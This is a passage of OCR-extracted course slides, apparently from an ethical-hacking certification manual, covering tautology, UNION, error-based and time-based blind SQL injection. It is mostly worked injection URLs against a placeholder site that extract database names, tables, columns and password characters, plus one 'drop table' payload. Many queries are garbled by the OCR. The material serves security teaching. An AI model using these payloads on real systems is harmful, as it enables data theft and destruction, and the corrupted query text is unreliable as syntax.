illegal/logically incorrect requests such as injectable parameters, data types, names of
tables, etc.
Q
Tautology: Injecting statements that are always true so that queries always return
results upon evaluation of a W H ERE condition.
SELECT * FROM u se rs WHERE name =
Module 14 Page 2035
or
יl ׳= ׳l
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
51. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Union Query: ״UNION SELECT" statement returns the union of the intended dataset
with the target dataset SELECT Name, Phone, Address FROM Users W HERE ld=l UNION
ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable.
Module 14 Page 2036
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
52. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
U nion SQL In jectio n E x a m p le
Union SQL Injection ־Extract
Union SQL Injection - Extract
Database Name
Database Tables
http://juggyboy.com/page.
aspx?id=l
UNION SELECT ALL 1,DB_NAME,3,4—
[D B_N AM E]
http://juggyboy.com/page.aspx?id=l
UNION SELECT ALL 1,name,3,4 from
sysobjects where xtype=char(85)--
Returnedfrom theserver
[EMPLOYEE_TABLE]
Returnedfromtheserver
Union SQL Injection ־Extract Table
Union SQL Injection - Extract 1st
Column Names
Field Data
http://juggyboy.
com/page.aspx?id=l
UNION SELECT ALL 1 ,column_name,3,4 from
DB_NAME.
information_schema.columns
where table_name ='EMPLOYEE_TABLE'—
h t t p :/ / j u g g y b o y .c o m / p a g e .aspx?id=l
UNION SELECT ALL 1,COLUMN-NAME1,3,4 from EMPLOYEE_NAME —
[EM PLOYEE_NAME]
[FIELD 1 VALUE]
Returnedfrom theserver
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Union SQL Injection Example
UNION SQL injection is used when the user uses the UNION command. The user
checks for the vulnerability by adding a tick to the end of a ".php? id=" file. If it comes back with
a MySQL error, the site is most likely vulnerable to UNION SQL injection. They proceed to use
ORDER BY to find the columns, and at the end, they use the UNION ALL SELECT command.
Extract Database Name
This is the example of union SQL injection in which an attacker tries to extract a database name,
h t t p :/ / ju gg yb oy. com/page. asp x ?id = l UNION SELECT ALL 1 ,DB_NAME,3,4-[DB_NAME] Returned from the server
Extract Database Tables
This is the example of union SQL injection that an attacker uses to rxtract database tables.
h t t p :/ / ju gg yb oy. com/page. asp x ?id = l
s y s o b je c ts where x typ e= ch ar(85)--
UNION
SELECT
ALL
1 ,name,3,4
from
[EMPLOYEE_TABLE] Returned from the server.
Extract Table Column Names
This is the example of union SQL injection that an attacker uses to extract table column names.
Module 14 Page 2037
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
53. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
h t t p :/ / ju gg yb oy. com/page. asp x ?id = l UNION SELECT ALL 1, column name, 3, 4 from
DB_NAME. in fo rm a tio n _ schema. Columns where t a b le _ name = 'EMPLOYEE_TABLE'-[EMPLOYEE_NAM E]
Extract 1st Field Data
This is the example of union SQL injection that an attacker uses to extract field data.
h t t p : //ju g g yb o y. com/page. asp x ?id = l UNION
from EMPLOYEE_NAME --
SELECT
ALL
1,
COLUMN-NAME-1,
3,
4
[FIELD 1 VALUE] Returned from the server
Module 14 Page 2038
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
54. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL Injection Error Based
Extra ct Database Name
w http://juggyboy.com/page.aspx?id=
1 or l=convert(int,(DB_NAME))—
a
Syntax error converting the nvarchar value 1
[DB
NAME]' to a column of data type int.
CEH
tilled IUkJ M M
m*
Extra ct 1st Database Table
t http://juggyboy.com/page.aspx?id=l
t
or l=convert(int,(select top 1 name
from sysobjects where
xtype=char (8 5 )))—
טSyntax error converting the nvarchar value
,[TABLE NAME 1]' to a column of data type int.
Extra ct 1st Table Colum n Name
t http://juggyboy.com/page.aspx?id=l or
t
l=convert(int, (select top 1
column_name from
DBNAME.information_schema.columns
where table_name='
TABLE-NAME-1'))—
»
Extra ct 1st Field of 1st Row (Data)
» http://juggyboy.com/page.aspx?id=l
or l=convert(int, (select top 1
COLUMN-NAME-1 from TABLE-NAME-1))w Syntax error converting the nvarchar value
'[FIELD 1 VALUE]' to a column of data type int.
Syntax error converting the nvarchar value
,[COLUMN NAME 1]' to a column of data
type int.
Copyright © by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited.
SQL Injection Error Based
The attacker makes use of the database-level error messages disclosed by an
application. This is very useful to build a vulnerability exploit request. There are even
chances of automated exploits based on the different error messages generated by the
database server.
Extract Database Name
The following is the code to extract database name through SQL injection error-based method:
h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t , (DB_NAME)) —
Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.
Extract 1st Table Column Name
The following is the code to extract the first table column name through the SQL injection errorbased method:
h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t ,
( s e le c t
column_name
from
DBNAME. in fo rm atio n _sch em a. columns
table_nam e=1
TABLE-NAME-1' ) ) Syntax error converting the nvarchar value
top 1
where
'[COLUMN NAME 1]' to a column of data type int.
Extract 1st Database Table
Module 14 Page 2039
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
55. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
The following is the code to extract the first database table through the SQL injection errorbased method:
h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t ,
from s y s o b je c ts where x typ e= ch ar( 8 5 ) ) ) —
( s e le c t top 1 name
Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.
Extract 1st Field Of 1st Row (Data)
The following is the code to extract the first field of the first row (data) through the SQL
injection error-based method:
h t t p :/ / ju g g yb oy. com/page. asp x ?id = l
COLUMN-NAME -1 from TABLE-NAME-1) ) —
Syntax error converting the nvarchar value
Module 14 Page 2040
or
l= c o n v e r t ( in t ,
( s e le c t
top
1
'[FIELD 1 VALUE]' to a column of data type int.
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
56. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
M odule Flow
CEH
U rtifM
IthKJi lUch•(
Copyright © by EG-GtODCil. All Rights Reserved. Reproduction is Strictly Prohibited.
M odule Flow
Previously we discussed various types of SQL injection attacks. Now, we will discuss
each type of SQL injection attack in detail. Let us begin with the blind SQL injection attack. Blind
SQL injection is a method that is implemented by the attacker when any server responds with
any error message stating that the syntax is incorrect.
(v W
SQL Injection Concepts
^
1*
0
Testing for SQL Injection
SQL Injection Tools
')
Types of SQL Injection
(^q—1j Blind SQL Injection
-
Advanced SQL Injection
^—
Evasion Techniques
Countermeasures
V- ׳
SQL Injection Methodology
Module 14 Page 2041
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
57. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
This section introduces and gives a detailed explanation of blind SQL injection attacks.
Module 14 Page 2042
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
58. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
W hat I s B lin d SQL In je c tio n ?
CEH
Copyright © by EC-ClllCil. All Rights Reserved. Reproduction Is Strictly Prohibited.
What Is Blind SQL Injection?
Blind SQL injection is used when a web application is vulnerable to SQL injection. In
many aspects, SQL injection and blind injection are same, but there are slight differences. SQL
injection depends on error messages but blind injections are not dependent on error messages.
W here ever there is web application vulnerability, blind SQL injection can be used to either
access the sensitive data or to destroy the data. Attackers can steal the data by asking a series
of true or false questions through SQL statements. Results of the injection are not visible to the
attacker. This is also more time consuming because every time a new bit is recovered, then a
new statement has to be generated.
Module 14 Page 2043
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
59. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
No Error Messages Returned
ln this attack, when the attacker tries to perform SQL injection using a query such as: "I
JuggyBoy'; drop table Orders - ", to this statement, the server throws an error message with a
detailed explanation of the error with database drivers and ODBC SQL server details in simple
SQL injection; however, in blind SQL injection, the error message is thrown to just say that
there is an error and the request was unsuccessful without any d e ta ils .(
JuggyBoy' drop table Orders -־
;
Blind SQL Injection (Attack Successful)
Simple SQL Injection
M ic r o s o f t OLE DB P r o v id e r f o r
ODBC D r iv e r • • r r o r '8 00 4 0*14 ־
(M ic r o s o f t ) [COBC SQL S e r v e r
D r iv e r J (SQL S e r v e r ](Jn o lo s e d
q u o t a t io n ■ ark b e fo r e th e
c h a ra a te r s trin g * '.
/ s h o p p in g / b u y . a s p x , l i n e 52
F IG U R E 14.13: No Error M essages R eturned
Module 14 Page 2044
Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil
All Rights Reserved. Reproduction is Strictly Prohibited.
60. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Blind SQL Injection: WAITFOR
DELAY YES or NO Response
; I F EXISTS (SELECT * FROM creditcaxd)
WAITFOR DELAY '0:0 :1 0 *—
Copyright © by EG-GWHICil. All Rights Reserved. Reproduction is Strictly Prohibited.
Blind SQL Injection: W A ITFO R DELAY YES or NO
Response
Step 1:; IF EXISTS(SELECT * FROM creditcard) WAITFOR DELAY '0:0:10'Step 2: Check if database "creditcard" exists or not
Step 3: If No, it displays "W e are unable to process your request. Please try back later".
Step 4: If YES, sleep for 10 seconds. After 10 seconds displays "W e are unable to process your
request. Please try back later".
Since no error messages are returned, use the 'waitfor delay' command to check the SQL
execution status
W A IT FOR DELAY ,time' (Seconds)
This is just like sleep; wait for a specified time. The CPU is a safe way to make a database wait.
WAITFOR DELAY '0 :0 :1 0 '- BENCHMARK() (Minutes)
This command runs on MySQL Server.
BENCHMARK(howmanytimes, do t h is )
Module 14 Page 2045
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
61. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
©OG0
; IF EXISTS (SELECT * FROM creditcard)
WAITFQR DELAY '0:0:10'—
Oops!
W e are unable to process
your request. Please try
back later.
Since no error messages are returned,
use ,w a i t f o r d e l a y ' command to
check the SQL execution status
Oops!
W e are unable to process
your request. Please try
back later.
FIGURE 14.14: WAITFOR DELAY YES or NO Response
Module 14 Page 2046
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
62. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Blind SQL Injection Exploitation (MySQL)
r c1
1
™~ 5
Searching for the first character of the first
table entry
/?id=l+AND+555=if(ord(mid((select+pass+from
Searching for the second character
of the first table entry
users+limit+0 ,1) ,1,1) )= [971,555,777)
/?id=l+AND+555=if(ord(mid((select+pass
from+users+limit+O, 1 ) , 2 , 1))= [9 7 1 5 5 5 ,777)
If the table "users" contains a column
"pass" and the first character of the first
entry in this column is 97 (letter "a"), then
If the table "users" contains a column
"pass" and the second character of
the first entry in this column is 97
DBMS will return TRUE; otherwise, FALSE.
(letter « a » ), then DBMS will return
TRUE; otherwise, FALSE.
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Blind SQL Injection ־Exploitation (MySQL)
SQL injection exploitation depends on the language used in SQL. An attacker merges
two SQL queries to get more data. The attacker tries to exploit the Union operator to easily get
more information from the databaase management system. Blind injections help an attacker
to bypass more filters easily. One of the main differences in blind SQL injection is entries are
read symbol by symbol.
Searching for the first character of the first table entry
/ ?id=l+AND+555=if(ord(m id( (select+ pass+ from
97.555.777)
u s e rs+ lim it+ 0 ,1 ) ,1 , 1 )) =
If the table "users" contains a column "pass" and the first character of the first entry in this
column is 97 (letter "a"), then DBMS can return TRUE; otherwise, FALSE.
Searching for the second character of the first table entry
/ ?id=l+AND+555=if(ord(m id( (sele ct+ p a ss
97.555.777)
from +users+lim it+O,1 ) ,2 , 1 )) =
If the table "users" contains a column "pass" and the second character of the first entry in this
column is 97 (letter «a»), then DBMS can return TRUE; otherwise, FALSE.
Module 14 Page 2047
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
63. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Blind SQL Injection - Extract
D atabase User
CEH
Finding a full user name of 8 characters using binary search method takes 56 requests
Check for username length
h t t p : / / j u g g y b o y . c o m / p a g e .a s p x ? id = l; I F
(L E N (U S E R )=1) WAITFOR DELAY '0 0 : 0 0 :1 0 י
h t t p :/ / ju g g y b o y . c o m / p a g e .a s p x ? id = l; I F
(L E N (U S E R )= 2 ) WAITFOR DELAY '0 0 :0 0 :1 0 •
h t t p :/ / ju g g y b o y . c o m / p a g e .a s p x ? id = l; I F
(L E N (U S E R )=3) WAITFOR DELAY '0 0 : 0 0 :1 0 '
17 נ
Check if 1st character in username contains 'A' (a=97), 'B', or ,C etc.
h t tp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F
( A S C I I(lo w e r (s u b s t r in g ((U S E R ),1 ,1 )))= 9 7 )
WAITFOR DELAY '0 0 :0 0 :1 0 '
h t tp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F
( A S C I I(lo w e r (s u b s t r in g ((U S E R ),1 ,1 )))= 9 8 )
WAITFOR DELAY '0 0 :0 0 :1 0 '
h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F
( A S C I I(lo w e r (s u b s t r in g ((U S E R ),1 ,1 )))= 9 9 )
WAITFOR DELAY '0 0 :0 0 :1 0 '
Check if 2n character in username contains ׳A' (a=97), 'B', or *C etc.
d
h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id - l;
I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ), 2 , 1 ) ) ) - 9 7 )
WAITFOR DELAY '0 0 :0 0 :1 0 '
h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x 7 id - l;
I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ), 2 , 1 ) ) ) - 9 8 )
WAITFOR DELAY '0 0 :0 0 :1 0 '
h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x 9 id - l;
I F ( A S C I I (lo w e r (s u b s t r in g ((U S E R ), 2 , 1 ) ) ) - 9 9 )
WAITFOR DELAY '0 0 :0 0 :1 0 '
Check if 3rd character in username contains 'A' (a=97), 'B 1 or 'C etc.
,
h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F
( A S C I I(lo w e r (s u b s t r in g ((U S E R ),3 ,1 )))= 9 7 )
WAITFOR DELAY '0 0 :0 0 :1 0 '
h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F
( A S C I I(lo w e r (s u b s t r in g ((U S E R ),3 ,1 )))= 9 8 )
WAITFOR DELAY '0 0 :0 0 :1 0 '
h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F
( A S C I I(lo w e r (s u b s t r in g ((U S E R ),3 ,1 )))= 9 9 )
WAITFOR DELAY '0 0 :0 0 :1 0 '
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
Blind SQL Injection ־Extract Database User
In the blind SQL injection method, the attacker can extract the database user name.
The attacker can probe yes/no questions from the database server to extract information from
it. To find the first letter of a user name with a binary search, it takes 7 requests and for 8 char
long name it takes 56 requests.
Module 14 Page 2048
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
64. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Finding a full username of 8 characters using binary search method takes 56 requests
Check for username length
http://juggyboy.com/page.aspx?id=l;
IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'—
http://juggyboy.com/page.aspx?id=l;
IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'—
http://juggyboy.com/page.aspx?id=l;
IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'—
Check if 1st character in usernam e contains ,a 1(a=97), !b or ,c1etc.
http://juggyboy.con/page.aspx?id=l;
IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'
http://juggyboy.con/page.aspx?id=l;
IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'
http://juggyboy.con/page.aspx?id=l;
IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'
Check if 2n character in username contains 1 (3=97), ,b', or ,c1 etc.
d
a1
http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),2,1)))=97)
WAITFOR DELAY '00:00:10 ־
http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),2,1)))-98)
WAITFOR DELAY ’00:00:10'
http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),2,1)))=99)
WAITFOR DELAY '00:00:10'
Check if 3rd character in usernam e contains ,a 1(a=97), ,b', or ,c1etc.
http://juggyboy.con/page.aspx?id=l;
IF (ASCII(lower(substring((USER),3,1)))=97)
WAITFOR DELAY 00:00:10'־
http://juggyboy.con/page.aspx?id=l;
IF (ASCII(lower(substring((USER),3,1)))=98)
WAITFOR DELAY '00:00:10'
http://juggyboy.con/page.aspx?id=l;
IF (ASCII(lower(substring((USER),3,1)))=99)
WAITFOR DELAY '00:00:10'
FIGURE 14.15: Extract Database User
Module 14 Page 2049
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
65. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Blind SQL Injection - Extract
D atabase N am e
CEH
C h eck fo r D a ta b a s e N a m e Length and N a m e
http://juggyboy.com/page.aspx?id=l;
I F (LEN(DB_NAME())=4) WAITFOR DELAY 00: 00: 10— '־
h t t p ://juggyboy.com/page.aspx?id= l;
I F (A SC II(lo w e r(s u b strin g ( (DB_NAME()),1 ,1 )))= 9 7 )
http://juggyboy.com/page.aspx?id=l;
I F (ASCII(lower(substring((DB_NAM E()),2 ,1 )))= 9 8 )
WAITFOR DELAY '00:00:10י
h t t p ://juggyboy.com/page.aspx?id= l;
I F (ASCII(lower(substring((DB_NAM E()),3 ,1 )))= 9 9 )
WAITFOR DELAY '00:00:10'
h t t p ://juggyboy.com/page.aspx?id= l;
I F (A SC II(lo w e r(s u b strin g ( (DB_NAME( ) ) , 4 , 1 ) ) ) =100)
WAITFOR DELAY '00:00:10י
WAITFOR DELAY '00:00:10י
Database Name = ABCD
http://juggyboy.
com/page.
aspx?id-l;
WAITFOR DELAY ' 0 0 : 0 0 : 1 0 ' —
http://juggyboy.com/page.aspx7id-l;
xtype-char(85)),1,1)))-101) WAITFOR
http://juggyboy.com/page.aspx7id-l;
xtype-char(85)), 2 , 1 ) ))-109) WAITFOR
http://juggyboy.com/page.aspx7id-l;
xtype-char(85)),3,1)))=112) WAITFOR
IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype-1 ')3)״
U
IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where
DELAY '00:00:10'-IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where
DELAY ' 0 0 : 0 0 : 1 0 '- IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where
DELAY '00:00:10'—
Table Name = EM P
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
^
Blind SQL Injection ־Extract Database Nam e
In the blind SQL injection method, the attacker can extract the aatabase name using the
time-based blind SQL injection method. Here, the attacker can brute force the database name
by using time before the execution of the query and set the time after query execution; then he
or she can assess from the result that if the time lapse is 10 seconds, then the name can be 'A;׳
otherwise, if it took 2 seconds, then it can't be 'A'.
Module 14 Page 2050
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
66. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Check for Database Name Length and Name
h t t p : //juggyboy . com/page . aspx?id=l ;
I F (LEN (DB_NAME () )=4) WAITFOR DELAY '00:00:10' —
h t t p : //juggyboy.com/page. asp x?id= l;
I F (A S C II(lo w e r(s u b s trin g ( (DB_NAME( ) ) , 1 , 1 ) ) )=97)
h t t p :// juggyboy. cocn/page. asp x ?id= l;
I F (A SCII (lower (su bstring ( (DBNAME ( ) ) ,2 , 1 ) ) ) =98)
WAITFOR DELAY '00:00:10— ״
h t t p : //juggyboy.com/page.asp x?id= l;
I F (A S C II(lo w e r(s u b s trin g ( (DB_NAME( ) ) , 3 , 1 ) ) ) =99)
WAITFOR DELAY '0 0 :0 0 :1 0 '—
http://juggyboy.com /page.aspx?id=l;
I F (A S C II(lo w e r(s u b s trin g ( (DBNAME( ) ) , 4 , 1 ) ) ) =100)
WAITFOR DELAY '0 0 :0 0 :1 0 '—
WAITFOR DELAY '0 0 :0 0 :1 0 '—
Database Name = ABCD
Extract 1st Database Table
http://juggyboy.com/page.
aspx?id=l;
WAITFOR DELAY '00:00:10'—
http://juggyboy.
com/page.
aspx?id=l;
xtype=char (85)) ,1,1)) )=101) WAITFOR
http://juggyboy.com/page.
aspx?id=l;
xtype=char(85)),2,1)))=109) WAITFOR
http://juggyboy.
com/page.
aspx?id=l;
xtype=ahar(85)),3,1)))=11?) WAITFOR
IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=' ' =3)
U )
IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjeats where
DELAY '00:00:10' —
IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjeats where
DELAY '00:00:10' —
IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjeats where
DELAY '00:00:10י
—
Table Name = EMP
F IG U R E 14.16: Extract D atabase N am e
Module 14 Page 2051
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
67. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Blind SQL Injection - Extract
Colum n N am e
C EH
E x tra ct 1st T ab le C o lu m n N a m e
h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (LEN(SELECT TOP 1 column name from ABCD. info rm atio n schema. columns
where table_name= יEMP')=3) WAITFOR DELAY '00:00:10' —
h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from
ABCD. inform ation_schem a. columns where table_name=' EMP' ) , 1 , 1 ) ) ) =101) WAITFOR DELAY '0 0 :0 0 :1 0 '—
h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from
ABCD.inform ation_schem a.columns where table_name='EMP' ) , 2 , 1 ) ) ) =105) WAITFOR DELAY '0 0 :0 0 :1 0 '—
h t t p :/ / juggyboy.com/page.asp x ?id = l/ I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from
ABCD.inform ation_schem a.columns where table_name=*EMP' ) , 3 , 1 ) ) ) =100) WAITFOR DELAY '00:00:10'--
Column Name = EID
—
m
i 1 1 1 1 1 1 1 1 1 1 1 1 1111
E x tra ct 2nd Table C o lu m n N a m e
http ://juggyboy. com/page, aspx? id-1; IF (LEN (SELECT TOP 1 column_name from ABCD. in f ormation_schema. columns where
table_name-' EMP' and column_name>' EID 4- ( ) יWAITFOR DELAY '00:00:10•—
http://juggyboy.com/page.aspx7id-l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from
ABCD.information_schema.columns where table_name-' EMP' and column_name>' EID ' ) , 1 , 1 ) ) )-100) WAITFOR DELAY '00:00:10'http://juggyboy.com/page.aspx7id-l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from
ABCD.information_schema.columns where table_name=' EMP' and column_name>' EID ' ) , 2 , 1 ) ) ) -101) WAITFOR DELAY '00:00:10'http://juggyboy.com/page.aspx?id=l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from
ABCD.information_schema.columns where table_name=' EMP' and column_name>' EID ' ) , 3 , 1 ) ) )=112) WAITFOR DELAY '00:00:10'http://juggyboy.com/page.aspx?id=l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from
ABCD.information_schema.columns where table_name=' EMP' and column_name>' EID ' ) , 4 , 1 ) ) ) =116) WAITFOR DELAY '00:00:10'-
Column Name = DEPT
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
Blind SQL Injection ־Extract Column Nam e
In the blind SQL injection method, the attacker can extract the column names using
different brute force methods or tools using which he or she can check for the first table
column name and the second table column name.
Extract 1st Table Column Name
h t tp :/ / ju g g y b o y .coct/page . aspx ־id - l
*
I F (LEN(SELECT TOP 1 co lu s ־r . _ r . f r o n
whore t a b le name- יEM I' - ) יJ ) MA1TFOR DELAY ■00:00:10
ABCD. in fo r m a tio n _ 9 c h e n a . colu m n s
h t tp :/ / ju g g y b o y . co«/p»g• 1 1 p x ?1 d s l: 1r (A S C II (lo v e r ( s u b s t r in g ( (SELECT TOP 1 e o lim n name from
ABCD. in forma t io : _schw»n ״c o lu m n s where ta b le _ n a !r « « ' E M P ') , 1 , 1 ) ) )■101) WAIYFOR DELAY '00 0 0 :1 0 ' —
*
1
h ttp :/ / ju g g y b o y .c o n / p a g e .asp x ?id - 1 . I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 colunn_nane from
ABCD. inform ataon_scheraa. columns where ta b le_r.am e -'E M P') ,2 ,1 )) )-105) WAITFOR DELAY - י 01 :00 :00 יh ttp :/ / ju g g y b o y .c o re / p a g e .a s p x ? ld = l; I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 column nano from
A B C D .in fo rm atio n _B c h an a.columns where table_ram e= ' EM P ') , 3 , 1 ) ) )■100) WA1TFOR DELAY '0 0 :0 0 :1 0 '- -
Column Name =EID
Extract 2nd Table Column Name
h te p ://j u g g y b o y .c a a /p a g e .& £ p x ? 3 .d = l; I F (1-EN | SELECT TCS 1 c o l a n r . i x e f r c n ABCD. i n f o r a a t i s r . s c h a i u . colum ns x k e re
t a b l e _ ״a n e - ־EMP’ a n d c o lu n n _ n a n s> EID 4- ( ־KATTrOP DELAY '0 0 : 0 0 7 1 0 '- )
h t t p : / / j u g g y b o y • 0 c « /p « g * .a « p x '>1.*Bl r I F (ASCI I ( lo w e r ( s u b s t r i n g ( (SKLECT TOP 1 eolumn_nacr* from
ABCD. i n f o r a a tio n _ 3 c h c a a . c o l us® בw h ere ta b lc _ n m r^ ■ ־EH? * ־a d c o 1 w _ 3 c o k > ' E IS ' ) , 1 ,1 ) ) ) ■100) WAITTOR
h t t p : / / J u g g y b o y .c c a / p a g e . a s p x ־d E i ; i f (ASCII (lo w e r ( s u b s t r i n g ( (SELECT TOP l colux» _n<*r« f r o n
>l
A B C D .in fo z tta tio n s c h s a a .c o lu a m • w h ere t a b l e m m - ' EMP ־a nd ־. . •»* .« ־
>a*e> EID 101- ( ( (2 , 1 , ( )־WAITFOR
h t t p : / / j u g g y b o y . c o n / p a g e . a s p x * i d - l ; 2F ( A S C I I ( lo w e r ( s u b s tr in g ( (SELECT TOP 1 c o lu n ! >«x« from
ABC□, i n f o n r j t i o n e rh o n a e o l u m i w h ere t a b l e nw e=E N S >' and . ־ ־i n r n a a e V E I ' ) , 3 , 1 )7 ) =i 12) WAITFOR
h t t p ! / / j u g g y b o y . a a n /p a g e . a s p x ? d = l .* I F (ASCII (lo w e r ( s u b s tr .rv g ( (SELECT TOP 1 colum n nacce f r o n
ABCD. in f o r m a tl o n _ s c h e a a . c o lu n n s w here ta b le _ n a & e > ־EMP' a nd colu*r_r»a»e>• EID ) ,4 , 1) ) )■116) WAITFOR
1
1
1
DELAY '0 0 : 0 0 : 1 0 '- DELAY
0 0 : 0 0 : 1 0 '- -
DELAY
0 0 :0 0 :1 0 • - -
DELAY
0 0 : 0 0 : 1 0 '- -
Column Name = DEPT
FIGURE 14.17: Extract Database User
Module 14 Page 2052
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.